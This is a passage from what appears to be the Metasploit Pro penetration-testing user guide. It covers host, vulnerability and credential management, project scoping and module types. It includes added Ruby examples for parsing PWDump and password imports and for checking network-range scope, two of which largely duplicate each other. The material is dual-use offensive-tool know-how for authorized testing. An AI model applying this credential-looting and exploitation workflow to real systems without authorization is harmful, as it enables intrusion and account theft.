1. Select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Select the host or hosts that you want to delete.

3. Click the Delete button. A confirmation window appears.

4. Click OK to delete the host or hosts.


Adding, Editing, and Deleting Services


The Services list is populated when you run a scan or import hosts into a project. However, there may be cases where you want to manually modify the services list. You can add, edit, or delete services for any host.

Adding a Service to a Host

To add a service to a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that you want to add a service to. The single host page opens and shows the Services list.

3. Click the New Service button. The New Service modal window appears.


4. Specify the following information for the service:

- Name - The service name, such as HTTP, DNS, or SMTP.
- Port - The port that the service runs on.
- Protocol - The protocol, TCP or UDP, that the port uses.
- State - The port state can be open, closed, filtered, or unknown.
- Info - Any additional information that you may have about the service, such as the version that is running.

5. Click the Submit button when you are done.


Editing a Service

To edit a service:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host whose services you want to edit. The single host page opens and shows the Services list.

3. Click the Edit icon that is located in the same row as the service you want to modify. The Name, Port, Protocol, and State fields become editable.

4. Make your changes to any of the editable fields.

5. Click the Save link when you are done.


Deleting a Service from a Host

To delete a service from a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that you want to delete a service from. The single host page opens and shows the Services list.

3. Find the service that you want to delete.

4. Click the Delete button that is located in the same row as the service. A confirmation window appears.

5. Click OK to delete the service.


Adding, Editing, and Deleting Vulnerabilities


In order to identify potential vulnerabilities that may exist on a target network, you will need to run a Nexpose scan, run a Discovery Scan, or import vulnerability scan data. Metasploit Pro stores the vulnerability information that it finds for each host in the project. Vulnerabilities can be viewed and managed at the project level or at the host level.

Adding a Vulnerability to a Host

To add a vulnerability to a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that you want to add a vulnerability to. The single host page appears.

3. Click the Vulnerabilities tab. The Vulnerabilities list appears.


4. Click the New Vuln button. The New Vulnerability modal window appears.

5. Enter a name for the vulnerability in the Name field.

6. Click the Add Ref button. The Reference field becomes editable.

7. Enter the vulnerability reference ID or URL in the reference field.

8. If you have additional references you would like to add for the vulnerability, click on the Add Ref button and repeat the previous step.

9. Click the Submit button when you are done.


Adding a Vulnerability Reference

To add a reference ID to a vulnerability:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that has the vulnerability you want to add a reference to. The single host page appears.

3. Click the Vulnerabilities tab. The Vulnerabilities list appears.

4. Click the Edit icon that is located in the same row as the vulnerability you want to edit. The Edit Vulnerability window appears.


5. Click the Edit icon. The Reference field becomes editable.

6. Edit the vulnerability reference ID or URL.

7. Click the Submit button when you are done.

Deleting a Vulnerability Reference

To delete a reference ID from a vulnerability:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that has the vulnerability you want to delete a reference from. The single host page appears.


3. Click the Vulnerabilities tab. The Vulnerabilities list appears.

4. Click the Edit icon that is located in the same row as the vulnerability you want to edit.

5. Find the reference you want to delete and click the Delete icon. The reference is removed from the list.

Note: If you have additional references you would like to delete, repeat the previous step until you are done.

6. Click the Submit button when you are done.


Deleting a Vulnerability from a Host

To delete a vulnerability from a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that has the vulnerability you want to delete. The single host page appears.

3. Click the Vulnerabilities tab. The Vulnerabilities list appears.

4. Click the Delete icon that is located in the same row as the vulnerability you want to remove. A confirmation window appears.

5. Click OK to delete the vulnerability. The vulnerability is removed from the list.


Deleting a Vulnerability from All Hosts

To delete a vulnerability from the project:


1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears.

2. Click the Grouped View button in the Quick Tasks bar. The project displays the individual vulnerabilities in the project.

3. Select the vulnerabilities you want to delete from the project.

Note: When you delete vulnerabilities from the grouped view, it removes them from all of the hosts that currently have them.

4. Click the Delete Vulnerabilities button in the Quick Tasks bar. A confirmation window appears.


5. Click OK to continue with the deletion.


Adding, Editing, and Deleting Credentials


In Metasploit Pro, a credential pair refers to a user name and password combination that can be used to authenticate to systems, accounts, and services. The user name is the login name that identifies a user, and the password can be a plain text password, hash, or SSH key. Generally, credentials can be bruteforced, looted from exploited systems, or collected using social engineering techniques. If you have a password list, user name list, username/password list, PWDump, or SSH key, you can import them into a project. Credentials can be managed at the project level or at the host level.
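Before a credential list is imported into a project, it is worth knowing what is in it. The following Ruby example is added here and is not Metasploit's own code: it classifies lines in the import formats the paragraph names (a username/password list, PWDump records, and OpenSSH public key lines) into records shaped like the Credentials list (type, user, secret), reports lines it cannot parse by line number, and flags PWDump accounts whose NT hash is the well-known empty-password hash. The sample input is constructed, and the assumption that username/password lists use a single space as separator is the author's, not the guide's.

```ruby
# Added example (not Metasploit's own code): classify lines from the credential
# import formats the guide names (user name/password lists and PWDump), so an
# operator can review what will land in a project. Sample input is constructed.

# Well-known constants: the LM field written when LM hashing is disabled, and the
# NT hash of an empty password.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

# PWDump record: user:RID:LMhash:NThash:::
PWDUMP_RE = /\A(?<user>[^:]+):(?<rid>\d+):(?<lm>\h{32}):(?<nt>\h{32}):::\z/
# OpenSSH public key line: "<key type> <base64> [comment]"
SSH_PUB_RE = %r{\A(?<kt>ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-\S+) (?<b64>[A-Za-z0-9+/=]+)(?: (?<comment>.+))?\z}

# Maps one line to a record shaped like the Credentials list (type, user,
# secret). Assumption: user name/password lists use one space as separator.
def classify_line(line, separator: ' ')
  s = line.strip
  if (m = PWDUMP_RE.match(s))
    nt = m[:nt].downcase
    { type: 'SMB hash', user: m[:user], rid: m[:rid].to_i, lm: m[:lm].downcase, nt: nt,
      lm_present: m[:lm].downcase != EMPTY_LM, blank_password: nt == EMPTY_NT }
  elsif (m = SSH_PUB_RE.match(s))
    { type: 'SSH public key', user: m[:comment], key_type: m[:kt], key: m[:b64] }
  elsif s.include?(separator)
    user, pass = s.split(separator, 2)
    { type: 'password', user: user, password: pass, blank_password: pass.empty? }
  end
end

# Parses a whole import file. Blank lines and # comments are skipped; lines that
# match no format are reported by number rather than silently dropped.
def import_credentials(text, **opts)
  records = []
  rejected = []
  text.each_line.with_index(1) do |line, n|
    s = line.strip
    next if s.empty? || s.start_with?('#')
    rec = classify_line(s, **opts)
    if rec
      records << rec.merge(line: n)
    else
      rejected << n
    end
  end
  { records: records, rejected: rejected }
end

# Constructed sample import (not real credentials).
SAMPLE_IMPORT = <<~TXT
  # constructed sample
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
  svc_backup Summer2014
  ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYDATA ops@bastion
  broken:12:abc:def:::
TXT

# Accounts whose stored NT hash is the empty-password hash: worth flagging
# before they are added to a project as valid logins.
def blank_password_users(text)
  import_credentials(text)[:records].select { |r| r[:blank_password] }.map { |r| r[:user] }
end

if __FILE__ == $PROGRAM_NAME
  result = import_credentials(SAMPLE_IMPORT)
  result[:records].each { |r| puts "#{r[:type]}: #{r[:user]}" }
  puts "rejected lines: #{result[:rejected].inspect}"
  puts "blank passwords: #{blank_password_users(SAMPLE_IMPORT).inspect}"
end
```

The read/write versus read-only distinction the Credentials form offers is not something an import file carries, so the password records are typed simply as `password` and the operator chooses the access level in the form.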

Viewing Credentials for a Project

To view the credentials for a project:


1. From within a project, click on the Overview tab from the Project Tab bar. The Dashboard appears.

2. Click the Bruteforce button located in the Quick Tasks bar. The Bruteforce configuration page appears.

3. Scroll down to the bottom of the Bruteforce configuration page and locate the Authentication Token Details list. All credentials that are stored in the project will be listed here.


Viewing Credentials for a Host

To view the credentials for a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host whose credentials you want to view. The single host page appears.

3. Click the Credentials tab. The Credentials list appears.

What information does the Credentials list show?


The Credentials tab shows the following information:
- Timestamp - Time the credential was added to the project.
- Service - The service that was authenticated with the credentials.
- Type - The type of loot collected, such as read/write password, read-only password, SMB hash, SSH public key, or SSH private key.
- User - The user name that can be used to authenticate to a service.
- Password, Hash, or SSH Key Fingerprint - The plaintext password or raw data for an SMB hash or SSH key that can be used to authenticate to a service.
- Source Credential or Session - Indicates how the loot was obtained. Sources can be one of the following:
  - Guessed - The source type indicates that the credentials were obtained from a bruteforce attack.
  - Imported - The source type indicates that the credentials were obtained from a credentials list import.
  - Unverified - The source type indicates an inactive credential.
  - Unknown - The source type indicates that Metasploit Pro was unable to find a source match.
  - <User:pass> - The source type indicates that the credential pair was created from another credential pair.
  - Link to a session - The source type indicates that the credentials were obtained from collecting evidence from an active session.

Adding a Known Credential Pair

To add a known credential pair to a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that you want to add a credential to. The single host page appears.


3. Click the Credentials tab. The Credentials list appears.

4. Click the New Cred button. The New Credentials modal window appears.

5. Specify the following information for the credential pair:

- Service - The service that can be authenticated with the credentials. The most common ports and services are listed for you to choose from.
- Type - The type of credentials that you are adding. Choose between the following credential types: read/write, read-only, SMB hash, SSH private key, and SSH public key.
- User - The user name for the credential pair.
- Password - The password, hash, or key for the credential pair.

Note: You can leave the user name and password fields empty for blank credentials. If you are adding an SSH key, you will need to copy and paste the contents of the key into the Password field.


6. Click the Submit button when you are done. The credential pair is added to the Credentials list.

Editing a Credential Pair

To edit a credential pair:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host whose credentials you want to edit. The single host page appears.

3. Click the Credentials tab. The Credentials list appears.


4. Click the Edit icon that is located in the same row as the credential pair you want to modify. The Service, Type, User, and Password fields become editable.

5. Make your changes to any of the editable fields.

6. Click the Save link when you are done.


Deleting a Credential Pair from a Host

To delete a credential pair from a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host whose credentials you want to delete. The single host page appears.

3. Click the Credentials tab. The Credentials list appears.

4. Find the credential pair that you want to delete.


5. Click the Delete button that is located in the same row as the credential pair. A confirmation window appears.

6. Click OK to delete the credential pair.


Adding, Editing, Downloading, and Deleting Captured Data


Captured data refers to evidence that was either imported into the project or gathered during evidence collection. These are files that provide evidence to support your findings and recommendations. Some examples of captured data include screenshots and system files. You can manage captured data on a project level or at the host level.

Adding Captured Data to a Host

To add captured data to a host:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host you want to add captured data to. The single host page appears.

3. Click the Captured Data tab. The Captured Data list appears.


4. Click the New Captured Data button. The New Captured Data modal window appears.

5. Click the Choose File button to navigate to the location of the file you want to upload.

Note: You can upload any type of loot that you've collected, such as password files, screenshots, and system files.

6. Enter a name for the file in the Name field. By default, this field is populated with the original file name.

7. Enter the content type. For example, the content type can be any of the supported MIME content types, like text/plain, image/jpeg, or text/html.

8. Enter any additional information you want to provide about the file in the Info field.

9. Click Submit when you are ready to upload the file.


Downloading a Captured Data File

To download captured data:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host you want to download captured data from. The single host page appears.

3. Click the Captured Data tab. The Captured Data list appears.

4. Find the captured data file you want to download. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays.

5. Click the Download link that is located in the same row as the file you want to download. The file is downloaded and saved to your local system.


Viewing a Captured Data File

To view a captured data file:


1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.

2. Click on the IP address for the host that has the captured data file you want to view. The single host page appears.

3. Click the Captured Data tab. The Captured Data list appears.

4. Find the captured data file you want to view. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays.

5. Click the View link that is located in the same row as the file you want to view. The file opens in a modal window.


Viewing All Captured Data in a Project

To view all captured data in a project:


From within a project, select Analysis > Captured Data from the Project Tab bar. The Captured Data page appears and lists all files that are stored in the project. You can download or view files directly from the Captured Data page.

Deleting Captured Data from a Project

To delete captured data from a project:


1. From within a project, select Analysis > Captured Data from the Project Tab bar. The Captured Data page appears and lists all files that are stored in the project.

2. Select the files you want to delete.

3. Click the Delete Evidence button in the Quick Tasks bar.


Chapter 5: Projects

The first step to set up a penetration test is to create a project. A project represents the workspace that you use to create and run a test. You create projects to separate your tests and engagements into logical groupings.
- About Projects on page 97
- Project Management on page 98
- Team Collaboration on page 109
- Host Comments on page 112

About Projects
A project contains the workspace that you use to perform the different steps for a penetration test and store the data that you collect from the target. You create a project to configure tasks and to run tests. You can create as many projects as you need, and you can switch between projects while tasks are in progress.

From within a project, you define the target systems that you want to test and configure the tasks that you want to run against those targets. For example, you can scan targets for active services and hosts, attempt to exploit vulnerabilities, collect data from exploited machines, and generate reports that detail your findings.

Every project has an owner. The owner can choose the users who can access the project to edit, view, and run tasks. However, users with administrative access can view and edit any project, regardless of whether or not the project owner gives them access.

You can create projects to separate an engagement into logical groupings. Oftentimes, you may have different requirements for the various departments, or subnets, within an organization. Therefore, it may be more efficient for you to have different projects to represent those requirements. For example, you may want to create a project for the human resources department and another project for the IT department. Your requirements for these departments may vary greatly, so it would be logical for you to separate the targets into different projects. At the end of the engagement, you can generate separate reports for each department to perform a comparative analysis and present your findings to your organization or client.

Project Components
The following components are part of a project:
- Name - Provides a unique identifier for the project.
- Description - Describes the purpose and scope of the project.
- Network range - Defines the default network range for the project. When you create a project, Metasploit Pro automatically populates the default target range with the network range that you define for the project. Metasploit Pro does not force the project to use the network range unless you enable the network range restriction option.
- Network range restriction - An option that restricts a project to a specific network range. Enable this option if you want to ensure that the test does not target devices outside the scope of the engagement. If you enable this option, Metasploit Pro will not run tasks against a target whose address does not fall within the network range.
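The network range restriction is the project's scope guard, and it is useful to be able to check a target list against the same range notation outside the UI, for example when assembling an engagement's target file. The following Ruby example is added here and is not Metasploit Pro's own code: it parses a comma-separated network range in the formats the guide accepts under Setting the Network Range (a single address, a hyphenated first-last range, CIDR notation, and a trailing asterisk wildcard) and reports which targets fall outside it. The wildcard is expanded the way the guide describes it, 192.168.1.* meaning 192.168.1.1 through 192.168.1.255; that reading and the class and method names are the author's assumptions.

```ruby
require 'ipaddr'

# Added example (not Metasploit Pro's own code): a scope checker for the network
# range formats the guide accepts, so a target list can be screened before a task
# runs. Assumption: the guide's wildcard meaning, 192.168.1.* = 192.168.1.1-255.
class NetworkRange
  Entry = Struct.new(:low, :high, :text)

  OCTET = '\d{1,3}'.freeze
  ADDR  = "#{OCTET}(?:\\.#{OCTET}){3}".freeze

  attr_reader :entries

  # spec: comma-separated entries, e.g. "10.0.0.0/24, 192.168.1.*, 172.16.5.10-172.16.5.20"
  def initialize(spec)
    tokens = spec.split(',').map(&:strip).reject(&:empty?)
    raise ArgumentError, 'network range is empty' if tokens.empty?
    @entries = tokens.map { |t| parse(t) }
  end

  # True when the address falls inside at least one entry.
  def include?(address)
    ip = to_int(address)
    @entries.any? { |e| ip.between?(e.low, e.high) }
  end

  # Targets that the network range restriction would refuse.
  def out_of_scope(targets)
    targets.reject { |t| include?(t) }
  end

  private

  # IPv4 dotted quad to integer; any IPAddr parse error becomes an ArgumentError.
  def to_int(addr)
    ip = IPAddr.new(addr)
    raise ArgumentError, "IPv4 only: #{addr}" unless ip.ipv4?
    ip.to_i
  rescue IPAddr::Error => e
    raise ArgumentError, "invalid address #{addr.inspect}: #{e.message}"
  end

  def parse(tok)
    case tok
    when %r{\A#{ADDR}/\d{1,2}\z}                   # CIDR block
      r = IPAddr.new(tok).to_range
      Entry.new(r.first.to_i, r.last.to_i, tok)
    when /\A(#{ADDR})-(#{ADDR})\z/                 # hyphenated first-last range
      lo = to_int(Regexp.last_match(1))
      hi = to_int(Regexp.last_match(2))
      raise ArgumentError, "range end precedes start: #{tok}" if lo > hi
      Entry.new(lo, hi, tok)
    when /\A((?:#{OCTET}\.){1,3})(\*(?:\.\*)*)\z/  # trailing wildcard octets
      prefix = Regexp.last_match(1)
      n = Regexp.last_match(2).count('*')
      raise ArgumentError, "bad wildcard: #{tok}" unless prefix.count('.') + n == 4
      lo = to_int(prefix + (['1'] * n).join('.'))    # .1 per the guide's example
      hi = to_int(prefix + (['255'] * n).join('.'))
      Entry.new(lo, hi, tok)
    when /\A#{ADDR}\z/                             # single address
      ip = to_int(tok)
      Entry.new(ip, ip, tok)
    else
      raise ArgumentError, "unrecognized range entry: #{tok.inspect}"
    end
  rescue IPAddr::Error => e
    raise ArgumentError, "invalid entry #{tok.inspect}: #{e.message}"
  end
end

if __FILE__ == $PROGRAM_NAME
  scope = NetworkRange.new('10.0.0.0/24, 192.168.1.*, 172.16.5.10-172.16.5.20')
  puts "out of scope: #{scope.out_of_scope(%w[10.0.0.7 10.0.1.1 192.168.1.200 8.8.8.8]).inspect}"
end
```

A malformed entry raises rather than silently matching nothing, which is the behaviour you want from a scope guard: an empty or unparsable range should stop the task, not let every target through.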


Project Management
Each project has a name, description, network range, and user access list. As a project owner or an administrator, you can edit the project settings, choose the users who can access the project, and manage the data that the project contains.

Creating a Project
A project is the workspace that you use to build a penetration test. Each project logically groups together the hosts that you want to exploit and the type of information that you want to obtain. Every project has a name, description, and network range. After you create a project, you need to run a discovery scan or an import to bring host data into the project.

1. From the Projects page, click the New Project button.

2. When the New Project page appears, find the Project Settings area, and enter the following information:


- Project name - This is a unique identifier that helps you differentiate between projects.
- Description - This is a summary of the purpose and scope of the project.
- Network range - This is the default network range that the project uses. The network range sets the default address range that automatically populates the Target Addresses field in discovery scans and Nexpose scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.

3. Select Restrict to network range if you want to enforce network boundaries on the project.

4. From the User Access area, select the following information:

- Project owner - This is the person who owns the project.
- Project members - These are the users who can access, edit, and run the test.

5. Create the project.

Viewing All Projects


To view a list of all projects, select Project > Show All Projects from the main menu.


Importing Data from Other Projects


1. From within a project, click the Overview tab.

2. Click the Import button.

3. When the Import Data page appears, click on the Browse button to open the File Upload window.

4. When the File Upload window appears, browse to the location of the Metasploit ZIP file.

5. If you do not want to import the information for a specific host, you can enter the IP address for that host in the Exclude Addresses field. If you need to enter multiple hosts, you need to use a comma to separate each address.


6. If you do not want the import to overwrite data for an existing host, you must select the Do not change existing hosts option.

7. Click the Import Data button.

Deleting a Project
When you delete a project, you remove all the data that the project contains, including reports, host data, evidence, vulnerability data, and host tags. After you delete a project, you cannot view or access the project again. If you want to delete the project, but save the project data, you can export the project data. When you export the project data, the system provides you with an XML or ZIP file of the project contents. You can import the XML or ZIP file to bring the project data back into Metasploit Pro.

1. Select Project > Show All Projects from the Main menu.

2. When the Projects page appears, select the projects that you want to delete.

3. Click Delete.


Changing the Project Owner


By default, the project owner is the person who initially sets up the project. You can change the project owner to transfer ownership and to assign projects to team members. The project owner provides a way for you and your team members to easily identify the projects that each of you own. For example, if you want to see the projects that you have been assigned, you can sort the project list by owner. All of your projects will be grouped together.

1. From the Main menu, select Project > Show All Projects.

2. When the Projects page appears, select the project that you want to assign an owner.

3. Click the Settings button.

4. When the Project Settings page appears, find the User Access area.

5. Click the Project owner dropdown and select the person you want to assign the project to.


6. Click the Update Project button.

Managing User Access


As the project owner, you may want to restrict the team members who can view and edit your project. For example, if you have data that you do not want anyone to overwrite, you can disable the access rights for other team members.

Note: Team members that have administrative rights can view and modify all projects, regardless of the user access settings.

1. From the Main menu, select Project > Show All Projects.

2. When the Projects page appears, select the project that you want to edit.

3. Click the Settings button.


4. When the Project Settings page appears, find the User Access area.

5. Select project members to enable them to view and modify the project, or deselect project members to prevent them from modifying the project.

6. Click the Update Project button.

Setting the Network Range


When you create a project, you can define an optional network range that sets the scope of the project. The network range defines the addresses that Metasploit Pro uses to automatically populate the target addresses for discovery scans and Nexpose scans. It also defines network boundaries that Metasploit Pro can enforce for the project. You do not need to set the network range unless you want to enforce network boundaries. If you choose to enforce network boundaries on a project, Metasploit Pro uses the network range that you define for the project.

1. From within a project, select Project > Show All Projects from the Main menu.

2. Select the project that you want to set the network range for.


3. Click the Settings button.

4. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hyphens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example, 192.168.1.* indicates 192.168.1.1-255.


5. Click the Update Project button.

Restricting a Project to a Network Range


You can restrict the network range to enforce network boundaries on a project. When you restrict a project to a network range, you cannot run any tasks unless the target addresses fall within the network range that you define. For example, if you have a client who wants you to test a specific network range, you can set the network range and restrict the project to it to ensure that you do not accidentally target any devices that are outside of that range.

1. Select Project > Show All Projects from the Main menu.

2. Select a project and click the Settings button.


3. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hyphens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example, 192.168.184.* indicates 192.168.184.1-255.

4. Select the Restrict to Network Range option.


5. Click the Update Project button.
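The range notations accepted by the Network range field and the check that "Restrict to Network Range" performs, as an added Ruby example (not Metasploit Pro's own code): it expands a range field into address intervals and reports which target addresses fall outside them. It assumes IPv4 only, treats the asterisk as 1-255 exactly as the guide states, and also accepts an abbreviated last-octet range (10.0.0.5-9), which is an assumption beyond the guide's wording.

```ruby
# Added example, not Metasploit Pro code: model the project network range and
# the "Restrict to Network Range" check. IPv4 only. Entries in the range field
# may be separated by commas, whitespace or newlines (an assumption here).
require 'ipaddr'

# Convert a dotted quad to a 32-bit integer, rejecting malformed input.
def ip_to_i(addr)
  octets = addr.strip.split('.')
  raise ArgumentError, "bad IPv4 address: #{addr}" unless octets.size == 4
  octets.reduce(0) do |acc, o|
    n = Integer(o, 10)
    raise ArgumentError, "octet out of range in #{addr}" unless (0..255).cover?(n)
    (acc << 8) | n
  end
end

# Make sure a hyphenated range is given low-high.
def ordered_pair(lo, hi, text)
  raise ArgumentError, "reversed range: #{text}" if lo > hi
  [lo, hi]
end

# Expand one entry into an inclusive [first, last] pair of integers.
def parse_entry(entry)
  e = entry.strip
  case e
  when %r{\A\d+\.\d+\.\d+\.\d+/\d+\z}                   # CIDR: 192.168.1.0/24
    r = IPAddr.new(e).to_range
    [r.first.to_i, r.last.to_i]
  when /\A(\d+\.\d+\.\d+)\.\*\z/                         # wildcard: 192.168.1.* means .1-.255 (as the guide states)
    [ip_to_i("#{$1}.1"), ip_to_i("#{$1}.255")]
  when /\A(\d+\.\d+\.\d+\.\d+)-(\d+\.\d+\.\d+\.\d+)\z/   # full range: a.b.c.d-a.b.c.e
    ordered_pair(ip_to_i($1), ip_to_i($2), e)
  when /\A(\d+\.\d+\.\d+)\.(\d+)-(\d+)\z/                # short range: a.b.c.d-e (assumed shorthand)
    ordered_pair(ip_to_i("#{$1}.#{$2}"), ip_to_i("#{$1}.#{$3}"), e)
  when /\A\d+\.\d+\.\d+\.\d+\z/                          # single host
    n = ip_to_i(e)
    [n, n]
  else
    raise ArgumentError, "unrecognised network range entry: #{entry.inspect}"
  end
end

# Parse a whole Network range field into a list of [first, last] pairs.
def parse_network_range(text)
  text.split(/[\s,]+/).reject(&:empty?).map { |entry| parse_entry(entry) }
end

# Targets that fall OUTSIDE the project's range. Empty means the task may run.
def out_of_scope(range_text, targets)
  ranges = parse_network_range(range_text)
  targets.reject do |t|
    n = ip_to_i(t)
    ranges.any? { |lo, hi| (lo..hi).cover?(n) }
  end
end

# The restriction the guide describes: every target must be inside the range.
def task_allowed?(range_text, targets)
  out_of_scope(range_text, targets).empty?
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a client scope of two ranges, and one stray target.
  scope   = "192.168.184.*\n10.0.5.0/28"
  targets = %w[192.168.184.1 192.168.184.255 10.0.5.15 10.0.6.1]
  puts "out of scope: #{out_of_scope(scope, targets).inspect}"   # => ["10.0.6.1"]
  puts "task allowed? #{task_allowed?(scope, targets)}"           # => false
end
```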


Team Collaboration
The multi-user support provides you with the ability to collaborate on an engagement or penetration test with other team members. You and your team can log into the same instance of Metasploit Pro to perform tasks, review data, and share projects. You can access Metasploit Pro through the Metasploit Web UI, which can run on the local machine or across the network. Some features that you can implement to enhance team collaboration are network boundaries, host tags, and host comments. These features help you create separate workloads for each team member and organize an engagement into logical containers. For example, you may want to assign certain hosts to a specific team member to test.

User Access Management


Each project has a list of users who can access the project. Any person who has access to the project can edit, view, and run tasks from the project. You can manage the user access to control who you want to have access to the information stored within the project.

Adding Users to a Project


You can give team members access to a project so that they can view, edit, and run tasks from the project.

1. From the Main menu, select Project > Show All Projects.

2. Select the project that you want to add users to.


3. Find the User Access settings. The User Access list displays all Metasploit Pro users.

4. Click the Settings button.

5. Select the users that you want to have access to the project.

6. Click the Update Project button.

Removing Users from a Project


You can remove members from a project to restrict their ability to view, change, or run tasks from the project. When you remove a user from a project, you disable their access to the project.

1. From within a project, select Project > Project Settings.


2. Find the User Access settings. The user access list displays all available Metasploit Pro users.

3. Deselect the users that you do not want to have access to the project.

4. Click the Update Project button.

Assigning the Project to a User


The project owner is the person who sets up the project and assumes responsibility for the data and penetration test. You can use the project owner role to delegate projects or workloads to members on your team.

1. From the Main Menu, select Project > Show All Projects.

2. Select the project that you want to assign to a user.


3. Click the Settings button.

4. Find the User Access settings. The User Access list displays all available Metasploit Pro users.

5. From the Project Owner dropdown menu, choose an owner for the project.

6. Click the Update Project button.

Host Comments
You can add a host comment to share information about a host. For example, if you identify a vulnerability on a host, and you want to share that information with other project users, you can add a host comment to that host. When you view the host details, you can see comments that other users have added to the host.

Adding Host Comments


1. From within a project, select Analysis > Hosts.


2. Click on the name of the host to which you want to add a comment.

3. When the Host Details page appears, click the Update Comment button.

4. Enter the information you want to add to the host in the Comments field. For example, if you know that a host is not exploitable, you can add the information as a comment. When other team members see the note, they know that they should not attempt to exploit the host.

5. Click the Save Comments button.

Updating Host Comments


1. From within a project, select Analysis > Hosts.

2. Click on the name of the host whose comment you want to update.


3. When the Host Details page appears, click the Update Comment button.

4. Edit the information in the Comments field.


5. Click the Save Comments button.


Chapter 6: Modules

To learn more about modules, read the following topics:


- About Modules on page 117
- Module Search on page 121
- Module Statistics on page 123
- Modules Types on page 117
- Module Rankings on page 124

About Modules
Modules are the underlying core components of the Metasploit Framework. They provide the components and capabilities that Metasploit Pro needs to perform an attack or execute a task, such as exploiting a target or fingerprinting a host. Every task that Metasploit Pro performs is defined within a module. When you configure tasks and run them from the user interface, Metasploit Pro does a lot of work behind the scenes to select the appropriate modules that it needs to run. For example, the bruteforce attack runs a combination of service-specific modules that focus on the services that are running on the target hosts. Metasploit Pro builds an attack plan based on the services that have been identified by the discovery scan or import. If you want to learn more about a particular module, you can use the built-in module search engine or you can visit the Metasploit Exploit Database.

Modules Directory
Your local version of Metasploit Pro has a copy of the Metasploit Framework, which contains most of the modules that the exploit database contains. If you want to review the modules that are available on your local machine, you can browse to $INSTALL/metasploit/msf3/modules. The modules are categorized by type first and by protocol next. For example, you can find FTP fuzzers in the following location: $INSTALL/metasploit/msf3/modules/auxiliary/fuzzers/ftp.

Modules Types
The Metasploit Framework categorizes modules based on the type of action that the module performs. The majority of modules are either an exploit or an auxiliary module. Generally, if a module can obtain a shell on a remote machine, it is an exploit module. Otherwise, it is an auxiliary module.

Exploit Modules
An exploit module executes a sequence of commands to target a specific vulnerability found in a system or application. An exploit module takes advantage of a vulnerability to provide control of the target system. Generally, you use exploit modules to run remote code execution on a target machine and to target remote services and client-side applications. Some examples of exploits include buffer overflow, code injection, and web application exploits.


An exploit can be a client-side or server-side exploit. A client-side exploit typically occurs through the use of social engineering techniques. Server-side exploits, on the other hand, take advantage of active services on an exposed server.

Auxiliary Modules
Most modules that are not an exploit can be considered an auxiliary module. An auxiliary module is any module that does not execute a payload. Instead, it performs arbitrary actions that may not be directly related to exploitation and provides supplementary support for tasks that you need to perform a penetration test. Examples of auxiliary modules include vulnerability scanners, port scanners, fuzzers, and denial of service attacks.

Payload Modules
A payload is the shell code that runs after an exploit successfully compromises a system. The payload enables you to define how you want to connect to the shell and what you want to do to the target system after you take control of it. A payload can open a Meterpreter or command shell. Meterpreter is an advanced payload that allows you to write DLL files to dynamically create new features as you need them. For more information on Meterpreter, see the Meterpreter User Guide.

NOP Modules
A NOP generator produces a series of random bytes that you can use to bypass standard IDS and IPS NOP sled signatures. Use NOP generators to pad buffers.

Post-Exploitation Modules
A post-exploitation module enables you to gather more information or to gain further access to an exploited target system. Examples of post-exploitation modules include hash dumps and application and service enumerators.

Modules Excluded from Metasploit Pro


Most modules that are available in the framework are available in Metasploit Pro. However, some modules may be excluded if their dependencies are not bundled with the framework. The modules that are excluded depend on the following libraries:
- Oracle - Affects modules that target Oracle.
- Lorcon2 - Affects modules that target wireless systems.
- Libpcap - Affects modules that target sniffers.
- DECT - Affects modules that target telephony.

Common Module Options


The following options are available when you configure a module:
- Target Addresses - The hosts targeted by the exploit. Leave this field blank to include all hosts in the project.
- Excluded Addresses - The hosts excluded from the attack. Leave this field blank to include all hosts in the project.
- Exploit Timeout - The number of minutes the module has before it times out.
- Payload Type - The type of shell that the exploit obtains.
- Connection Type - The direction of the connection.
- Listener Ports - The port on the machine that the listener listens on.
- Listener Host - The address of the machine that the listener listens on.
- RPORT - The target port.
- RHOST - The target address.
- VHOST - The address for the HTTP virtual server.
- LHOST - The address for the local host.
- LPORT - The listener port on the local host.

Running a Module
1. From within a project, select Modules > Search.

